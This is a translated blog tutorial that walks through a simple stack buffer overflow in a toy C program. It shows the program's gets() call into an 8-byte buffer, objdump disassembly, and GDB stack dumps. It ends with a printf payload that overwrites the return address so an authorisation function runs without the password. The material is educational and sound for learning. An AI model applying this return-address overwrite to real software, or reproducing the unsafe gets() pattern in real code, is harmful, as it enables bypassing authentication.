Try this as an experiment: a simple buffer overflow

Blast 2014/04/16, though

From:www.spectrumcoding.com/tutorials/e… The translation is funny, all according to the original translation, with a little embellishment. I have added notes in the middle where there is a jam or where the author is not clear, you will see =v=.

0 x00 background

I’m not a full-time security person, but I did read something recently and found it very interesting.

I’m wiki.osdev.org/Expanded_Ma… I read these articles about buffer overflows while I was developing my operating system.

So I’m going to write a short introduction to buffer overflows in C programs. The reason is simple, I’ve learned these things, and I want you to practice them.

Today we are going to analyze a program that needs to enter a password correctly to pass the authentication. After the authentication, the program calls the Authorized () function.

However, if I now forget the password or don’t know it, we’ll have to call the Authorized () function with a buffer overflow.

0 x01 details

So, let’s get down to business. First, you should know what a stack is. If not, go to wiki.osdev.org/Stack. In simple terms, it is a lifO structure, growing from high address to low address. I will explain this by following the problematic procedure.

#! cpp #include <stdio.h> #include <crypt.h> const char pass[] = "$1$k3Eadsf$blee.9JxQ75A/dSQSxW3v/"; /* Password */ void authorized() { printf( "You rascal you! \n" ); } void getInput() { char buffer[8]; gets( buffer ); if ( strcmp( pass, crypt( buffer, "$1$k3Eadsf$" ) ) == 0 ) { authorized(); } } int main() { getInput(); return(0); }Copy the code

The code is simple. The user enters a password, the program encrypts it, compares it to the password stored in the program, and if it succeeds, calls the authorized() function. Think of the Authorized () function as a way for the user to do something sensitive after logging in (although in this example we only print a string). So, let’s compile it and see what happens.

#! bash[email protected] ~/D/p/overflow> gcc -ggdb -fno-stack-protector -z execstack overflow.c -lcrypt -o overflow
overflow.c: In function 'getInput':
overflow.c:12:2: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations]
  gets(buffer);
  ^
[email protected] ~/D/p/overflow> ./overflow
password
[email protected] ~/D/p/overflow>
Copy the code

The program allocates an 8-byte buffer, stores the user’s input into the buffer, and then calls a function to encrypt it and compare it with the password in the program.

The compiler tells us that gets() is unsafe when we compile, which it is, because it doesn’t do any boundary checking, so we use it to call the vulnerability.

Let’s use objdump to dump the generated machine code and see what it does here:

#! bash[email protected] ~/D/p/overflow> objdump -d -M intel blog
Copy the code

#! bash blog: file format elf64-x86-64 Disassembly of section .init ... Disassembly of section .plt: ... Disassembly of section .text: .... 00000000004006a0 <authorized>: 4006a0: 55 push rbp 4006a1: 48 89 e5 mov rbp,rsp 4006a4: bf e2 07 40 00 mov edi,0x4007e2 4006a9: e8 a2 fe ff ff call 400550 <[email protected]>
  4006ae: 5d                    pop    rbp
  4006af: c3                    ret

00000000004006b0 <getInput>:
  4006b0: 55                    push   rbp
  4006b1: 48 89 e5              mov    rbp,rsp
  4006b4: 48 83 ec 10           sub    rsp,0x10
  4006b8: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006bc: 48 89 c7              mov    rdi,rax
  4006bf: e8 dc fe ff ff        call   4005a0 <[email protected]>
  4006c4: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006c8: be f2 07 40 00        mov    esi,0x4007f2
  4006cd: 48 89 c7              mov    rdi,rax
  4006d0: e8 8b fe ff ff        call   400560 <[email protected]>
  4006d5: 48 89 c6              mov    rsi,rax
  4006d8: bf c0 07 40 00        mov    edi,0x4007c0
  4006dd: e8 9e fe ff ff        call   400580 <[email protected]>
  4006e2: 85 c0                 test   eax,eax
  4006e4: 75 0a                 jne    4006f0 <getInput+0x40>
  4006e6: b8 00 00 00 00        mov    eax,0x0
  4006eb: e8 b0 ff ff ff        call   4006a0 <authorized>
  4006f0: c9                    leave
  4006f1: c3                    ret

00000000004006f2 <main>:
  4006f2: 55                    push   rbp
  4006f3: 48 89 e5              mov    rbp,rsp
  4006f6: b8 00 00 00 00        mov    eax,0x0
  4006fb: e8 b0 ff ff ff        call   4006b0 <getInput>
  400700: b8 00 00 00 00        mov    eax,0x0
  400705: 5d                    pop    rbp
  400706: c3                    ret
  400707: 66 0f 1f 84 00 00 00  nop    WORD PTR [rax+rax*1+0x0]
  40070e: 00 00
Copy the code

I kept only the parts we were interested in and then formatted the disassembly data with Intel syntax. Let’s start with the main function, because that makes more sense to us (better than starting with libc_start_main and something else).

#! bash 00000000004006f2 <main>: 4006f2: 55 push rbp 4006f3: 48 89 e5 mov rbp,rsp 4006f6: b8 00 00 00 00 mov eax,0x0 4006fb: e8 b0 ff ff ff call 4006b0 <getInput> 400700: b8 00 00 00 00 mov eax,0x0 400705: 5d pop rbp 400706: c3 ret 400707: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0] 40070e: 00 00Copy the code

Look, what’s going on here? First, the RBP register is pushed onto the stack, which is then replaced by the contents of the RSP. If we look at the beginning of other functions, we’ll see something similar:

#! bash 00000000004006a0 <authorized>: 4006a0: 55 push rbp 4006a1: 48 89 e5 mov rbp,rsp ... 00000000004006b0 <getInput>: 4006b0: 55 push rbp 4006b1: 48 89 e5 mov rbp,rsp ...Copy the code

This is called function initialization, and of course the function has a finishing touch at the end. First the current bottom pointer (RBP) is pushed onto the stack, and then the bottom pointer is set to the address of the current top of the stack (RSP).

The previous bottom pointer points to the top of the previous stack frame, so that the stack is continuously pointed down. This allows the program to track the stack in case of an error, since the bottom pointer can point all the way down to the beginning of another stack frame.

A stack frame is a piece of memory on the stack used by a function call. It contains parameters (note: in 64-bit, if the system decides to pass parameters in registers, parameters may not exist), return addresses, and local variables. I come from wikipedia articles inside steal a picture, you can see: en.wikipedia.org/wiki/Call_s…

Function names vary, but the situation is the same: the stack grows down, so the return address of a function is higher in the local variable. Let’s go back to our previous function and see what that means for us. After the function initialization phase, there is a mov eax, 0x0 statement, after which our getInput() function is called.

#! bash 00000000004006b0 <getInput>: 4006b0: 55 push rbp 4006b1: 48 89 e5 mov rbp,rsp 4006b4: 48 83 ec 10 sub rsp,0x10 4006b8: 48 8d 45 f0 lea rax,[rbp-0x10] 4006bc: 48 89 c7 mov rdi,rax 4006bf: e8 dc fe ff ff call 4005a0 <[email protected]>
  4006c4: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006c8: be f2 07 40 00        mov    esi,0x4007f2
  4006cd: 48 89 c7              mov    rdi,rax
  4006d0: e8 8b fe ff ff        call   400560 <[email protected]>
  4006d5: 48 89 c6              mov    rsi,rax
  4006d8: bf c0 07 40 00        mov    edi,0x4007c0
  4006dd: e8 9e fe ff ff        call   400580 <[email protected]>
  4006e2: 85 c0                 test   eax,eax
  4006e4: 75 0a                 jne    4006f0 <getInput+0x40>
  4006e6: b8 00 00 00 00        mov    eax,0x0
  4006eb: e8 b0 ff ff ff        call   4006a0 <authorized>
  4006f0: c9                    leave
  4006f1: c3                    ret
Copy the code

We can see similar function initialization and then some interesting instructions before the gets. Let me show you the code again:

#!cpp
void getInput() {

  char buffer[8];
  gets(buffer);

  if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) {
    authorized();
  }
}
Copy the code

The stack expands to a 16-byte address (sub RSP, 0x10), after which raX is set to the top of the stack. What is this about? Our buffer is only 8 words, but we leave 16 bytes of space. This is because the x86 instruction stream SIMD extension requires that data be aligned with 16 bytes, so there are 8 bytes left in it purely for alignment, thus sneaking our space to 16 bytes.

After lea,[RBP-0x10] and mov Rdi, rax, rBP-0x10 points to the address that reads RDI, which is the alignment data that gets() will write later. As you can see, the stack grows downward, but the cache is from the top of the stack (RBP-0x10) to RBP.

So what are we supposed to do with all this talk? The goal is to get the Authorized () function running. So we can change the return value of the current function directly to the address of Auhtorized ().

When the Call instruction is executed, the RIP (instruction register) is pushed onto the stack. This is why the stack is aligned to 16 bytes after the push RBP: the return address is only 8 bytes long, and RBP has to align it with another 8 bytes. Let’s load our program in GDB and see what happens on the stack:

#! bash[email protected]~/D/p/overflow> GDB OVERFLOW GNU GDB (GDB) 7.6 Copyright (C) 2013 Free Software Foundation, Inc. GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-unknown-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /home/cris/Documents/projects/overflow/overflow... done. (gdb) set disassembly-flavor intel (gdb) disas main Dump of assembler code for function main: 0x00000000004006f2 <+0>: push rbp 0x00000000004006f3 <+1>: mov rbp,rsp 0x00000000004006f6 <+4>: mov eax,0x0 0x00000000004006fb <+9>: call 0x4006b0 <getInput> 0x0000000000400700 <+14>: mov eax,0x0 0x0000000000400705 <+19>: pop rbp 0x0000000000400706 <+20>: ret End of assembler dump.Copy the code

We want to see the stack as soon as we enter main(), so we set a breakpoint at push RBP and start the program to dump the stack:

#! bash (gdb) b *0x00000000004006f2 Breakpoint 1 at 0x4006f2: file overflow.c, line 19. (gdb) start Temporary breakpoint 2 at 0x4006f6: file overflow.c, line 21. Starting program: /home/cris/Documents/projects/overflow/overflow Breakpoint 1, main () at overflow.c:19 19 int main() { (gdb) x/8gx $rsp 0x7fffffffe6f8: 0x00007ffff7818a15 0x0000000000000000 0x7fffffffe708: 0x00007fffffffe7d8 0x0000000100000000 0x7fffffffe718: 0x00000000004006f2 0x0000000000000000 0x7fffffffe728: 0xab4f0bd07ac4a669 0x00000000004005b0Copy the code

So we can see that the stack is not aligned to 16 bytes yet. We just made a call to main, so we want the value at the top of the stack to be the return address of main. To verify this, we can decompile the code in this area. Let’s look at __libc_start_main. I’ve deleted all the useless output data.

#! bash Dump of assembler code for function __libc_start_main: ... 0x00007ffff7818a0b <+235>: mov rdx,QWORD PTR [rax] 0x00007ffff7818a0e <+238>: mov rax,QWORD PTR [rsp+0x18] 0x00007ffff7818a13 <+243>: call rax 0x00007ffff7818a15 <+245>: mov edi,eax 0x00007ffff7818a17 <+247>: call 0x7ffff782ecd0 <exit> ... End of assembler dump.Copy the code

On the address 0x00007ffff7818a15 is mov edi,eax, followed by an instruction calling exit(). Eax contains our exit code, which is the return code for the exit function. So, we have confirmed that the top of the stack is the return address of our main, and RBP is null on this pointer, so the two qWords pushed after it are 0x0000000000000000 and 0x00007FFF7818a15. We will step over, then break inside getInput() and stop:

#! bash (gdb) disas getInput Dump of assembler code for function getInput: 0x00000000004006b0 <+0>: push rbp 0x00000000004006b1 <+1>: mov rbp,rsp 0x00000000004006b4 <+4>: sub rsp,0x10 0x00000000004006b8 <+8>: lea rax,[rbp-0x10] 0x00000000004006bc <+12>: mov rdi,rax 0x00000000004006bf <+15>: call 0x4005a0 <[email protected]>
  0x00000000004006c4 <+20>: lea    rax,[rbp-0x10]
  0x00000000004006c8 <+24>: mov    esi,0x4007f2
  0x00000000004006cd <+29>: mov    rdi,rax
  0x00000000004006d0 <+32>: call   0x400560 <[email protected]>
  0x00000000004006d5 <+37>: mov    rsi,rax
  0x00000000004006d8 <+40>: mov    edi,0x4007c0
  0x00000000004006dd <+45>: call   0x400580 <[email protected]>
  0x00000000004006e2 <+50>: test   eax,eax
  0x00000000004006e4 <+52>: jne    0x4006f0 <getInput+64>
  0x00000000004006e6 <+54>: mov    eax,0x0
  0x00000000004006eb <+59>: call   0x4006a0 <authorized>
  0x00000000004006f0 <+64>: leave
  0x00000000004006f1 <+65>: ret

(gdb) b *0x00000000004006b1
Breakpoint 3 at 0x4006b1: file overflow.c, line 9

(gdb) c
Continuing.

Breakpoint 3 0x00000000004006b1 in getInput () at overflow.c:9
9 void getInput() {

(gdb) x/8gx $rsp
0x7fffffffe6e0: 0x00007fffffffe6f0  0x0000000000400700
0x7fffffffe6f0: 0x0000000000000000  0x00007ffff7818a15
0x7fffffffe700: 0x0000000000000000  0x00007fffffffe7d8
0x7fffffffe710: 0x0000000100000000  0x00000000004006f2
Copy the code

Having explained what these elements are, we can verify that 0x0000000000400700 is the return address of ret, and getInput() returns to main() again.

#! bash ... 0x00000000004006fb <+9>: call 0x4006b0 <getInput> 0x0000000000400700 <+14>: mov eax,0x0 ...Copy the code

Now, the next few commands extend the stack by 16 bytes, as mentioned earlier, and then call our gets() function. We place a breakpoint after gets() and continue:

#! bash (gdb) b *0x00000000004006c4 Breakpoint 4 at 0x4006c4: file overflow.c, line 14. (gdb) c Continuing. aabbccdd Breakpoint 4, getInput () at overflow.c:14 14 if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) { (gdb) x/8gx $rsp 0x7fffffffe6d0: 0x6464636362626161 0x0000000000400500 0x7fffffffe6e0: 0x00007fffffffe6f0 0x0000000000400700 0x7fffffffe6f0: 0x0000000000000000 0x00007ffff7818a15 0x7fffffffe700: 0x0000000000000000 0x00007fffffffe7d8Copy the code

I typed in the password “aabbCCdd” to make it easier for us. After returning from gets(), there are another 16 bytes on the stack “below” the previous data because we used sub RSP,0x10. Since these are used as buffers, we can see that the bytes are stored in reverse order. Zh.wikipedia.org/wiki/%E5%AD…). . 0x61 is the ASCII code for lowercase A, 0x62 is B, and so on. If we type 16 bytes of a, we can see that our data “fills up” the stack:

#! bash (gdb) b *0x00000000004006c4 Breakpoint 4 at 0x4006c4: file overflow.c, line 14. (gdb) c Continuing. aaaaaaaaaaaaaaaa Breakpoint 4, getInput () at overflow.c:14 14 if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) { (gdb) x/8gx $rsp 0x7fffffffe6d0: 0x6161616161616161 0x6161616161616161 0x7fffffffe6e0: 0x00007fffffffe6f0 0x0000000000400700 0x7fffffffe6f0: 0x0000000000000000 0x00007ffff7818a15 0x7fffffffe700: 0x0000000000000000 0x00007fffffffe7d8Copy the code

Therefore, if we provide a long enough input data, we can override the return address returned by the function with the authorize address. Decompile the Authorized () function to get the address we need:

#! bash (gdb) disas authorized Dump of assembler code for function authorized: 0x00000000004006a0 <+0>: push rbp 0x00000000004006a1 <+1>: mov rbp,rsp 0x00000000004006a4 <+4>: mov edi,0x4007e2 0x00000000004006a9 <+9>: call 0x400550 <[email protected]>
0x00000000004006ae <+14>: pop    rbp
0x00000000004006af <+15>: ret
End of assembler dump.
Copy the code

Now all we have to do is override getInput’s return address to 0x00000000004006A0, and we can do it. We can use printf in the shell to pass the data to the program. You can use \x to convert the hexadecimal data. Since the address is backwards, we can also pass it backwards. Also, we need to terminate our cache with 0x00 so that STRCMP does not cause a segment error before our function returns. Printf results in the following:

#! bash printf "aaaaaaaaaaaaaaaaaaaaaaa\x00\xa0\x06\x40\x00\x00\x00\x00\x00" | ./overflowCopy the code

There are 16 AS, seven empty characters (\x00) to override the RBP, and finally, we override the normal return address with our destination address. If we run it, the program will trigger a bug and go directly to Authorized (). Even though we haven’t typed in the right code.

#! bash[email protected]~/D/p/overflow> printf "aaaaaaaaaaaaaaaaaaaaaaa\x00\xa0\x06\x40\x00\x00\x00\x00\x00" | ./overflow You rascal you! fish: Process 9299, "./overflow "from job 1, "Printf" aaaaaaaaaaaaaaaaaaaaaaa \ x00 \ xa0 \ x06 \ x40 \ x00 \ x00 \ x00 \ x00 \ x00 "|. / overflow" terminated by signal SIGSEGV (Address boundary error)Copy the code

Our program will have an error because the return address to __libc_start_main on the stack is misaligned (the push RBP at the beginning of main never pops), but we can still see that it prints “You rascal You!” So we know that the Authorized () function has actually executed successfully.

0 x02 summary

Here it is! A simple buffer overflow, if you know how did this happen, you will feel this very cow force is too funny, as long as the executable is on the stack data, you can throw the code inside a buffer on the stack, so, for example, then put the return address points to the buffer, the process that would be permissions to perform your own code. This is no longer possible, but it is still possible to change the return address of a function, which is just as useful.

Some other links for those who want to learn (in English, from the author) : insecure.org/stf/smashst… www.eecis.udel.edu/~bmiller/ci… Developer.apple.com/library/mac… www.ibm.com/developerwo…

Try this as an experiment: a simple buffer overflow

0 x00 background

0 x01 details

0 x02 summary

Related Posts

Operation of a tuple

A mid-year summary of 5 years Java programmer, for you still confused

Design essentials of cross-platform screen/camera RTMP stream push module